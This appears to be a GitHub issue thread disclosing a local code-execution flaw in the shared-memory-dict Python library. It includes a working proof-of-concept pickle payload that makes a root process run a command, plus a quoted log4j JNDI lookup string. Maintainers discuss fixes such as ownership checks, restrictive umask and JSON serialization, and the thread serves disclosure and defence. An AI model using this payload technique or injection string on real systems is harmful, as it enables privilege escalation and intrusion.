shared-memory-dict
shared-memory-dict copied to clipboard
security considerations
The README should mention that the contents of the shared memory dict can be hijacked by any user which knows the name of the shared memory.
Getting the name is as simple as ls /dev/shm.
To hijack this, one must simply create a SharedMemoryDict instance before the to be hijacked process starts and set the /dev/shm file world-read and writable.
Here is a simple local code execution exploit:
Execute as user nobody:
$ python3
>>> with open('/dev/shm/sm_foo', 'wb') as fd:
... fd.write(b'\x80\x03csubprocess\ncall\nq\x00X\n\x00\x00\x00/bin/touchq\x01X\x0b\x00\x00\x00/tmp/hackedq\x02\x86q\x03\x85q\x04Rq\x05.')
...
66
$ ls -l '/dev/shm/sm_foo'
-rw-r--r-- 1 nobody nogroup 66 Okt 21 18:42 /dev/shm/sm_foo
Then execute a new process as any user (e.g. root):
$ python3
>>> import shared_memory_dict
>>> f = shared_memory_dict.SharedMemoryDict('foo', 500)
>>> f
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
File "/home/fbest/git/shared-memory-dict/shared_memory_dict/dict.py", line 115, in __repr__
return repr(self._read_memory())
File "/home/fbest/git/shared-memory-dict/shared_memory_dict/dict.py", line 169, in _read_memory
db = {key: self._unmap_value(key, value) for key, value in db.items()}
AttributeError: 'int' object has no attribute 'items'
$ ls -l /tmp/hacked
-rw-r--r-- 1 root root 0 Okt 21 18:45 /tmp/hacked
The command /bin/touch /tmp/hacked has been executed as root.
My proposed solution would be to check the to be opened file for the ownership:
- Does it belong to my user? → If not, reject.
- Is it only readable by myself? reject → because of information disclosure.
When we do this, we could lead in a DoS situation. So maybe there should be some force flag, which removed the existing file and recreates one with correct permissions.
Even better is, to drop the requirement for pickle. We want to store dicts. Dicts can be seen as a List of 2-tupels.
Using a nested multiprocessing.shared_memory.ShareableList could be used for that? By transforming it back when reading the entries:
return dict(ShareableList(
ShareableList(['key', 'value']),
ShareableList(['key2', 'value2']),
))
And consistency checks, like does the key exists already, etc.
I see you implemented a JSON Serializer which can be used alternatively. This is nice, as JSON is faster than pickle and doesn't have these security issues.
With JSON still a local information disclosure leak exists. A restrictive umask should be set during the initial file creation. And the two points from the comment above.
The disadvantages of JSON is that you cannot store bytes (all bytestrings are decoded using UTF-8).
@spaceone We (maintainers) will look carefully at this issue.
@cassiobotaro
Regarding pickle: It is also possible to strip down a unpickler, so that it basically can only handle primitive/simple types. But one cannot use the C implementation anymore (in py2.7 it was possible) but just the python implementation (which is pickle._Unpickler().
I am interested in this fix as well. We will eventually have some shared implementations where having this security would be effective.
I'm not sure this lib should handle this use case. IMHO SharedMemoryDict is a low level interface, like ShareableList. I know it may be a concern, but that should be handled by the user when necessary.
What about including a "caveat" section in the README to explain some security considerations?
The stdlib ShareableList is by design not affected but this library is. This lib must handle this use case - as the security concerns are the implementation details of this lib. Everything else would be "grossly negligent".
Including something in the README is definitely not enough. It won't be read by many. It won't be read by people already using the library.
Saying this is like saying don't log something like ${jndi:ldap://[some-IP-you-listen-on]/uniquestring]} in a Java/log4j application.
@spaceone I'm afraid I'm missing your point. I'm looking at ShareableList implementation and I still don't understand how it is not affected by the issue you raised. Could you please explain what it does differently?
Nothing is stored on disk in the standard library - they use pipes, UNIX sockets or TCP sockets which are protected by an authorization key. It also uses pickle but offers also some XML-RPC protocols.
Well, it looks like the same approach to me. ShareableList uses SharedMemory which is the same approach of SharedMemoryDict. SharedMemory uses a memory-mapped file.
Please, let me know if I'm missing something.
Oh sorry, my last comment was about the stdlib mulitprocessing.SyncManager - not ShareableList.
The ShareableList does not use Pickle - so it's not vulnerable to local code-execution. It is of course also affected by information disclosure and pre-manipulated input files.
Okay, I think I've got your point. Pickle opens up the door for remote code execution. We would not have that issue if we serialized the data using struct, like ShareableList or if internally we used a list of ShareableLists, as you mentioned.
In the meantime, we could make the pickle serialization safer, as you proposed in your PR #43. I have some concerns about where it should be implemented and the support for different OS's, but I think we can talk about that in the PR's thread.